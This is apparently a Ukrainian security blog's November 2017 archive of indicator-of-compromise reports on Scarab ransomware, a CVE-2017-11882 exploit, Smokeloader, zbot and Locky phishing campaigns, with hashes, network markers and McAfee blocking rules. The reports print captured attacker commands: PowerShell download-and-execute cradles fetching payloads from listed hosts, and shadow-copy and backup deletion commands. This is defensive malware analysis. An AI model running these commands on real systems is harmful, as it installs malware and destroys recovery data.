Archive | November 2017

IOC_Scarab_231117

Доброго дня, панове.

Звіт стосується розсилок Scarab Ransomware, які відбувалися на минулому тижні. Публікую для академічного розгляду оскільки:

Рівень загрози – нижче середнього. Для тих, хто прислухався до моїх рекомендаційнизький.

Звернень по цьому типу мені не надходило, а кім того, технічно механізм інфікування Scarab не відрізняється від інших (Locky, Cerber), які я вже розглядав.

Проте зважаючи на те, яку увагу (з подачі Кіберполіції) ЗМІ приділили розсилкам саме цього зразка – вирішив усе ж таки його розібрати.

Не без того, щоб вкотре нагадати вам прості та дієві методи захисту.

Трохи аналітики:

  • Шифрування стійке. На даний момент способу відновити файли – не знайдено
  • Факти інфікування даним класом шкідливого коду говорять про низький рівень обізнаності
  • Scarab спричинив багато галасу, бо на відміну від Locky, він шифрує одразу без перевірки умов, ще раз – Scarab шифрує завжди там, де був запущений
  • А це значить, що жертви Scarab ігнорували попередні інциденти тому що, розсилки з Locky не призводили до шифрування
  • Метод доставки – масовий, неперсоніфікований, нелокалізований, низькоякісний фішинг типу “відскановані документи”
  • Тип приманки – необфусковані VBS скрипти в архівах 7zip
  • Скрипти містять від 2 до 3 посилань на завантаження основної частини
  • Активація та шифрування відбуваються з правами користувача і можуть проходити без мережевих з’єднань (offline)
  • Ім’я основної частини чітко задане кодом скрипту і не змінюється
  • Перед початком шифрування зразок намагається видалити Shadow Copy, якщо права не надавати – шифрування продовжиться, просто без видалення тіньових копій

Схема атаки:

email > Attach 7z (VBS) > WSCript > GET JHgd476? > %temp%\VJMAQASU.exe

Маркери IOC:

приклади листів:

один із скриптів-приманок:

File name image2017-11-22-5379282.vbs
SHA-256 fd072a6c2fe9187f799a27e21c27fc67dd2f145ccbc0faa917f37469d0d26974
File size 3.8 KB

містить три посилання на завантаження основної частини:

krapivec = Array("miamirecyclecenters[.]com/JHgd476?","pamplonarecados[.]com/JHgd476?","hard-grooves[.]com/JHgd476?")

Останнє – досі активно і на звернення видає основну частину:

File name JHgd476  >> %temp%\VJMAQASU.exe
SHA-256 7a60e9f0c00bcf5791d898c84c26f484b4c671223f6121dc3608970d8bf8fe4f
File size 356.5 KB

Приклад запуску без надання привілеїв:

Приклад запуску із наданням привілеїв через UAC:

Запуск скрипту приводить до завантаження основної частини за шляхом %temp%\VJMAQASU.exe

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\image2017-11-22-5379282.vbs" 
"C:\Windows\System32\cmd.exe" /c call "C:\tmp\VJMAQASU.exe"
"C:\tmp\VJMAQASU.exe"

Після запуску Scarab через cmd.exe копіює своє тіло у %AppData%\Roaming\sevnz.exe

Та намагається отримати підвищення привілеїв для видалення тіньових копій (UAC)

Якщо йому це вдається, він копіює своє тіло ще раз у %AppData%\Roaming але вже для адміністративного облікового запису

"C:\Windows\system32\cmd.exe" /c copy /y "C:\tmp\VJMAQASU.exe" "C:\Users\operator\AppData\Roaming\sevnz.exe"
"C:\tmp\VJMAQASU.exe" runas
"C:\Windows\system32\cmd.exe" /c copy /y "C:\tmp\VJMAQASU.exe" "C:\Users\support\AppData\Roaming\sevnz.exe"
"C:\Users\support\AppData\Roaming\sevnz.exe"

Далі через mshta за допомогою javascript команд Scarab додає в автозавантаження посилання на замітку про викуп і ініціює видалення тіньових копій:

mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('sevnz.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\uSjBVNE',i);}catch(e){}},10);"
mshta.exe "javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\STYRX\\OCDPR'));close();"
"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
"C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETE
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\cmd.exe" /c vssadmin Delete Shadows /All /Quiet
vssadmin  Delete Shadows /All /Quiet
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

В фоні відбувається шифрування через послідовний перезапис файлів процесом AppData\Roaming\sevnz.exe

По завершенню шифрування Scarab відкриває файл із заміткою про викуп та ініціює видалення свого тіла (за обома шляхами – temp та appdata)

C:\Windows\system32\cmd.exe /c start /max notepad.exe "C:\Users\support\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT"
notepad.exe  "C:\Users\support\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT"
mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('sevnz.exe');close()}catch(e){}},10);"
mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('VJMAQASU.exe');close()}catch(e){}},10);"

Зашифровані файли отримують розширення .[suupport(@)protonmail[.]com].scarab

Шифрування невеликої кількості документів зайняло ~5-7 хвилин

Частина замітки про викуп:

__________________________________________________________________________________________________
|                                                                                                  |
|                 *** IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS ***                 |
|__________________________________________________________________________________________________|

Your files are now encrypted!

-----BEGIN PERSONAL IDENTIFIER-----
123oin123njnjndoiqn2oenq2oindiqndkqndknwqkndkawndkawndkl
-----END PERSONAL IDENTIFIER-----

All your files have been encrypted due to a security problem with your PC.

Мережеві IOC:

завантаження основного тіла Scarab:

5.2.88.79:80            HTTP 367 pamplonarecados[.]com GET /JHgd476? HTTP/1.1 
98.124.251.75:80      HTTP 375 atlantarecyclingcenters[.]com GET /JHgd476? HTTP/1.1
66.36.165.149:80      HTTP 372 hellonwheelsthemovie[.]com GET /JHgd476? HTTP/1.1
5.2.88.79:80            HTTP 367 pamplonarecados[.]com GET /JHgd476? HTTP/1.1
66.36.165.149:80      HTTP 372 hellonwheelsthemovie[.]com GET /JHgd476? HTTP/1.1
98.124.251.75:80      HTTP 371 miamirecyclecenters[.]com GET /JHgd476? HTTP/1.1
5.2.88.79:80            HTTP 367 pamplonarecados[.]com GET /JHgd476? HTTP/1.1
66.36.173.111:80      HTTP 364 hard-grooves[.]com GET /JHgd476? HTTP/1.1 (досі активний)

відправка даних про Public IP

88.99.66.31:80       HTTP 101 iplogger[.]co GET /18RtV6.jpg HTTP/1.1 - передача через cookie

Що можна було зробити аби уникнути інфікування ?

  1. Фільтр скриптових приєднань (VBS, JS, JSE, WSF..)
  2. Заборона завантаження скриптових та запусних файлів (payload у Scarab не шифрований)
  3. Заборона створення VBS та EXE в каталозі профілю користувача (приклади правил наведені нижче)
  4. Деактивація механізму Windows Scritp Host (другий варіант)
  5. Або блокування вихідного трафіку для процесів WSCritp та CSCript (перший варіант)

Приклади правил Access Protection (McAfee VSE, McAfee ENS):

Заборона створення запускних файлів

Name: _exe_prof_BLK
Process to include: *
Processes to exclude: -
File or folder name to block: **\Users\*\**\*.EXE
File actions to prevent:
+ Read
+ Write
+ Create
+ Execute

Заборона створення скриптових файлів (увага! приклад тільки для VBS, рекомендується продублювати правила для JS, JSE, WSF)

Name: _VBS_prof_BLK
Process to include: *
Processes to exclude: -
File or folder name to block: **\Users\*\**\*.VBS
File actions to prevent:
+ Read
+ Write
+ Create
+ Execute

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/створення/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR
Advertisements

IOC_EQNEDT32_211117

Запуск коду через редактор формул або CVE-2017-11882

Доброго вечора, панове.

Увага, 21го листопада було зафіксовано перші спроби застосування CVE-2017-11882 для доставки шкідливого коду.

Рівень загрози – високий!

У зоні ризику всі, хто не встановив оновлення MS Office.

Ця вразливість редактору формул, яка стосується MS Office 2007, 2010, 2013 та 2016.

Трохи аналітики:

  • код запускається від імені простого користувача через процес редактору формул
  • редактор формул отримує команди не напряму від додатку MS Office, а через svchost
  • код виконується одразу по факту відкриття документу, без діалогових вікон!
  • у файлі, який використовувався зловмисниками запуск/завантаження проміжного payload був реалізований через cmd.exe
  • розсилка яка проводилась 21го листопада не була направлена на українські організації
  • найближчим часом слід очікувати застосування цього методу при атаках на наші підприємства
  • відео, детальний опис експлуатації та тестовий файл на запуск calc.exe

Схема атаки:

email > Attach (RTF) > WINWORD.EXE > SVCHOST.EXE > EQNEDT32.EXE > CMD.EXE > ...

Маркери IOC:

документ приманка:

Filename      Swift changes.rtf
SHA256      17f9db18327a29777b01d741f7631d9eb9c7e4cb33aa0905670154a5c191195c
Size            31.07 KB

Спроба відкрити документ-приманку ініціює завантаження та запуск проміжної частини засобами cmd

cmd /c start \\138.68.234.128\w\w.exe

файл

Filename     w.exe
SHA256      60656140e2047bd5aef9b0568ea4a2f7c8661a524323111099e49048b27b72c7
Size           240.5 KB

На даний момент посилання вже недійсне.

Мережеві IOC:

завантаження проміжного payload

138.68.234.128

трафік скомпрометованої системи

104.144.207.207

Що можна було зробити аби уникнути інфікування ?

Для тих, у кого немає можливості на 100% встановити виправлення вразливості, можна застосувати просте правило Access Protection

Name: _11882_BLK
Process to include: *
Processes to exclude: -
File or folder name to block: EQNEDT32.EXE
File actions to prevent:
+ Read
+ Write
+ Execute

Контрзаходи:

  • Розгортання оновлень CVE-2017-11882 | Microsoft Office Memory Corruption Vulnerability
  • Зміна параметру Compatibility Flags в реєстрі – у моєму випадку не виправило запуску довільного коду
  • Заборона запуску вразливого процесу EQNEDT32.EXE (VSE/ENS Access Protection – див. приклад вище, групові політики)
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_smokeldr_121117_ДСНС_gov.ua

Доброго дня, панове.
Візьміть до уваги – в розсилці приймала участь скринька з домену gov.ua (заголовки не підроблені)!

12 листопада, близько 23ї години були зафіксовані спроби доставки троянського коду типу Smokeloader (Chanitor) (попередні зразки тут, тут і тут).
Цей клас шкідливого коду є сервісом доставки троянів або модулів для крадіжки паролів (Pony та ін.)
Фактично через нього зловмисники збирають інформацію із скомпрометованих систем і можуть в подальшому довантажити модуль шифрування/затирання файлів.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) – зверніть увагу на приклади трьох правил Access Protection які наведені в кінці допису

Трохи аналітики:

  • Рівень загрози – високий!, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.
  • Незважаючи на вельми примітивну техніку активації приманки (JS скрипти) я ставлю цій розсилці високий рівень загрози через той факт, що одним із джерел була скомпрометована скринька Управління ДСНС Чернігівської області (sribne@cndsns[.]gov[.]ua)

  • Схема роботи та інші атрибути вказують на роботу тої самої команди що розсилала цей же тип ШПЗ 17 жовтня
  • Доставка – через обфусковані JS скрипти із подвійним розширенням у оболонці lzh. (застосували інший формат для обходу фільтрів пошти)
  • Скрипт який було надано а аналіз містить одну прямо задану адресу, а основна частина записується із прямо заданим іменем файлу
  • Завантаження основної частини відбувається не через WSH, а засобами Powershell
  • Сервер з якого завантажується payload та сервер контролю – один і той же
  • Запуск шкідливого коду не потребує прав Адміністратора
  • Знову застосовується тактика використання скомпрометованих ресурсів/серверів держ. організацій – gov.ua як правило в “білому” списку
  • Слід очікувати повторних акцій із використанням міксу різних типів доставки та скомпрометованих джерел із зони gov.ua та ua
  • Не достатній рівень уваги до вразливостей застарілих версій систем, яким скористалися зловмисники, призвела до компрометації цього серверу, завтра чи навіть через годину хтось може стати наступним – не будьте жертвою, перевірте наявні вразливості, оновіть софт, змініть паролі

Схема атаки:

email > Attach (lzh) > JS > WSCript > PowerShell > single hardcoded URL > GET > %temp%\65536.exe 
ім'я запускного файлу(співпадає з попередньою розсилкою)

Маркери IOC:

архів:

File name Рахунки Продмаркет.lzh
SHA-256 a47e11e6dc8025575ac3f1742fcf84270d9cd2ab1757d59dee873b1a35f76528
File size 65.34 KB

скрипт приманка:

File name Рахунок по оплаты.xls.js
SHA-256 d0635dfd5e212e16c580d70a18d195a5cc842355a22348f925515a5520725231
File size 21.38 KB

основна частина:

File name micro.exe >> %temp%\65536.exe
SHA-256 63da5f0e5ed298cbf39422298c80f460fa75f46c7d78ce0dd806f30e70c027b5
File size 240 KB

Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\рахунок до оплаты.xls.js"

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $http_request = New-Object -ComObject Msxml2.XMLHTTP;
$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\65536.exe';
$http_request.open('GET', 'h11p:\\autoxls[.]ru/documentooborot/micro.exe', $false);
$http_request.send();if($http_request.Status -eq "200"){$adodb.open();
$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;
$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

"C:\tmp\65536.exe"

Після завантаження та запуску payload негайно зупиняє роботу утиліт моніторингу, копіює себе у

%User%\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe (співпадає з попередньою розсилкою)

Та додає себе у автозавантаження через HCU\Run

HKEY_USERS\S-1-5-....\Software\Microsoft\Windows\CurrentVersion\Run
IM Providers
C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe

Запускає кілька нових екземплярів explorer.exe і оперує від їх імені.

Зверніть увагу, що запущені процеси на х64 запускаються не з C:\Windows\ (штатний режим) а з C:\Windows\SysWOW64\

Мережеві IOC:

завантаження payload – досі активна

54.86.9.242:80 HTTP 375 autoxls[.]ru GET /documentooborot/micro.exe HTTP/1.1

трафік скомпрометованої системи – сервер контролю

54.86.9.242:80 HTTP 117 bbank[.]bit POST / HTTP/1.1  (application/x-www-form-urlencoded)

а тепер саме головне

Що можна було зробити аби уникнути інфікування ?

  1. Пересилку архіву із скриптом можна було заблокувати через фільтр приєднань по розширенням/типам файлів, але за умови що він розуміє формат lzh (Email Gateway)
  2. Запис JS приманки на диск (розпаковку файлів) можна було заборонити через блок створення JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу Powershell (одне правило вбудованого брандмауера)
  5. Передачу команди з WSCript на Powershell можна було заборонити через Access Protection Rules
  6. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)
Таким чином, як бачите, до запуску основного тіла було 6 кроків, упередження хоча би одного з них = зупинка атаки.

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Заборона вихідних мережевих зєднань для процесів Powershell
  • Заборона виклику POwershell через WSCript – додатково захистить від скриптів що йдуть як OLE об’єкти
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_zbot(RTF.OLE.JS)_021117

Доброго дня, панове.

Візьміть до уваги.

Отримав на аналіз документ приманку активація якої призводить до завантаження модифікованого zbot (Trojan).

Рівень загрози – середній. Для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Трохи аналітики:

  • Розсилка цього зразка проводилася ще 2-го листопада – посилання досі активні!
  • Лист та приманка локалізовані
  • Сервер що містить payload одночасно виступає сервером контролю (уже було)
  • Файл представляє собою RTF із OLE в якості об’єкту – js скрипт (комбінують різні способи)
  • На тестових системах нормально відобразився лише у Wordpad (2007й та 2013й Word не відкрили файл коректно)
  • Схема виклику трохи відрізняється від попередніх: WORDPAD > WSCript > Powershell > %temp%\*.exe
  • Оновлення MS Office, деактивація DDE від таких файлів не захищає, це OLE.
  • Тут або OLE вимикати, або мої правила застосовувати, або powershell блокувати.

Схема атаки:

email > .docx (RTF - OLE - JS) > запитання1? > WSCript > powershell > GET payload > %temp%\*.exe

Маркери IOC:

Дані по листу

2017-11-02 01:58:53 AM 
Connection from: 193.111.156.1 (mail.iphone.net.ua)
Sending server HELO string: mail.iphone.net.ua
Message id:
Message reference: ххххххххххххх
Sender: mmc@hl[.]ua
Recipient: *****@company.com.ua
SMTP Status: OK
Delivery attempt #1 (final)

Приєднання – документ-приманка

 

File name договор УРК.docx 
SHA-256 bcfd72b7a469940c1168bba27803c13bc350dedb23e85322b8e658de2df99ac4
File size 49.73 KB

При відкритті файлу користувача просять двічі клікнути по вбудованому об’єкту.

Якщо жертва клікає та ігнорує попередження – в %temp% видобувається скрипт

File name задолжность (2).js 
SHA-256 ef005f96c37eb2a1ab4a78aa9022397b0b5d73bba998057d17725038072f5c17
File size 19.84 KB

Виконання якого передає команду на powershell:

"C:\Program Files\Windows NT\Accessories\WORDPAD.EXE" "C:\Users\operator\Desktop\договор УРК.docx" 
"C:\Windows\System32\WScript.exe" "C:\tmp\задолжность (2).js"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\65536.exe';$http_request.open('GET', 'h11p://autoxls[.]ru/documentooborot/micro.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

Виконання команд призводить до завантаження payload

File name micro.exe  >> tmp\65536.exe
SHA-256 c47b43a0321f3c13fe42945bfa5bcbe223d8d326335d5856dd7c02dd07616fb8
File size 439.5 KB

Після його запуску він дублює себе у %appdata% із зміненою контрольною сумою мімікруючи під звичайні додатки (кожен запуск – інший: Skype, Mozilla, Macromedia, DTL etc)

"C:\tmp\65536.exe" 
"C:\Users\operator\AppData\Roaming\DAEMON Tools Lite\DAEMONToolsLiteSync.exe"
"C:\Windows\system32\cmd.exe" /c "C:\tmp\tmp8426d97e.bat"

 

File name DAEMONToolsLiteSync.exe 
SHA-256 65cb0804986075d3a8ed004a043cef3c3a2db6cff15788f6d5267d9abd711733
File size 439.5 KB

Крім того закріплюється через автозавантаження

HKEY_USERS\S-1-5-...\Software\Microsoft\Windows\CurrentVersion\Run
{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} 
"C:\Users\operator\AppData\Roaming\DAEMON Tools Lite\DAEMONToolsLiteSync.exe"

Після запуску починає активний мережевий обмін із сервером контролю.

Стандартні правила Acces Protection які могли б зупинити, яки були активовані:
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\PROGRAM FILES\WINDOWS NT\ACCESSORIES\WORDPAD.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\WINDOWS\SYSTEM32\WSCRIPT.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Delete
Would be blocked by port blocking rule (rule is currently not enforced) C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE Common Maximum Protection:Prevent HTTP communication 45.76.198.223:80
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Delete
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Would be blocked by port blocking rule (rule is currently not enforced) C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE Common Maximum Protection:Prevent HTTP communication 45.76.198.223:80
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create
Would be blocked by port blocking rule (rule is currently not enforced) C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE Common Maximum Protection:Prevent HTTP communication 45.76.198.223:80
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\USERS\OPERATOR\APPDATA\ROAMING\DAEMON TOOLS LITE\DAEMONTOOLSLITESYNC.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\{2EC4CDF0-C58B-E92B-792F-F9159CF05F9D} Common Maximum Protection:Prevent programs registering to autorun Action blocked : Create

Що можна було зробити аби уникнути інфікування ?

  1. Деактивувати механізм OLE
  2. Заборонити процесам MS Office створювати дочірні процеси крім кількох довірених (політики ENS ATP – DAC)
  3. Заборонити створення та зчитування/запуску *.JS* з каталогів профілю користувача %appdata% (політики VSE/ENS – Access Protection)
  4. Деактивація WSH (обробка скриптових файлів)
  5. Заборонити для процесів PowerShell доступ до мережі Інтернет (по аналогії із першим варіантом)
  6. Заборонити створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata% (політики VSE/ENS – Access Protection)

Мережеві IOC:

завантаження основного тіла

45.76.198.223:80 HTTP 375 autoxls[.]ru GET /documentooborot/micro.exe HTTP/1.1

трафік скомпрометованої системи

45.76.198.223:80 HTTP 590 docfileserver[.]ru POST /web/ HTTP/1.1

Контрзаходи:

  • Деактивація OLE через реєстр чи групові політики
  • Заборона створення дочірніх процесів для додатків MS Office (додати туди WSCript та WORDPAD)
  • Заборона доступу до мережі Інтернет для powershell (по аналогії із варіантом 1)
  • Деактивація WSH
  • Заборона створення та зчитування/запуску *.EXE та скриптових з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

%random%.doc > OLE(ps) > wera4.exe

Отримав на аналіз черговий зразок документу із OLE у вигляді ярлика на powershell.

Незважаючи на той факт, що даний зразок не був націлений на українські системи – в котре наголошую, що через певний час тактику застосування таких документів (тільки локалізованих та з іншими зображеннями) візьмуть на озброєння зловмисники, що будуть атакувати українські організації. Тому, будьте ласкаві, перевірте ще раз  – чи вжили ви необхідних заходів, аби активація такої приманки не залежала від людського фактору і була блокована одним із наведених методів у розділі “Контрзаходи”

Навіть зображення не змінили:

При активації в %temp% записується 4.lnk який містить такий рядок:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "$rv=[System.Uri]'h11p:\\with-hair[.]co.jp/693';$dx=(new-object IO.StreamReader((([Net.WebRequest]::Create($rv)).GetResponse()).GetResponseStream())).ReadToEnd();IEX $dx;"

Якщо жертва активує вбудований об’єкт процес Winword передає керування на powershell, що призводить до отримання списку адрес (необфускований)

Перелік із 6 URL по даній кампанії (завантаження проміжного payload який довантажує Locky)

$cpknos = "h11p:\\teesaddiction[.]com/JHgd3Dees","h11p:\\christaminiatures[.]nl/JHgd3Dees","h11p:\\336.linux1.testsider[.]dk/JHgd3Dees","h11p:\\florastor[.]net/JHgd3Dees","h11p:\\heinzig[.]info/JHgd3Dees","h11p:\\muchinfaket[.]net/p66/JHgd3Dees"
$cpknos = $cpknos | Sort-Object {Get-Random}
foreach($cpkno in $cpknos){
Try{
Write-Host $cpkno
$scpm = "$env:temp\wera4.exe"
Write-Host $scpm
$dum = (New-Object System[.]net.WebClient)
$dum.DownloadFile([System.Uri]$cpkno, $scpm)
Start-Process $scpm
break
}Catch{}}

Результат активації

Dropper та проміжний payload детектуються McAfee

Контрзаходи:

(такі самі як у попередньому аналізі)

Будьте уважні та обережні!

VR

OLE(ps) замість DDE

загадка:

не DDE, не макрос, а powershell викликає..

Доставку Locky почали здійснювати за допомогою OLE, де в якості об’єкту – ярлик на Powershell.

Важливий момент – в цьому випадку оновлення MS, деактивація DDE від таких файлів не захищає, бо це старе OLE. Інший механізм.

У кого було блокування створення .exe в профілі або хоча би %temp% – захищені

У кого були обидва правила на дочірні процеси – і на CMD і на Powershellзахищені

Усім іншим поки що повезло, бо проміжний downloader не завантажував основну частину на системи українського сегменту. Поки що.

В котре наголошую, що на фоні масових розсилок, які поки що не шкодять, в окремих цільових атаках можуть застосовуватися схожі, але вже локалізовані документи – із різними типами начинки як DDE, так і OLE, macros.

Схема атаки:

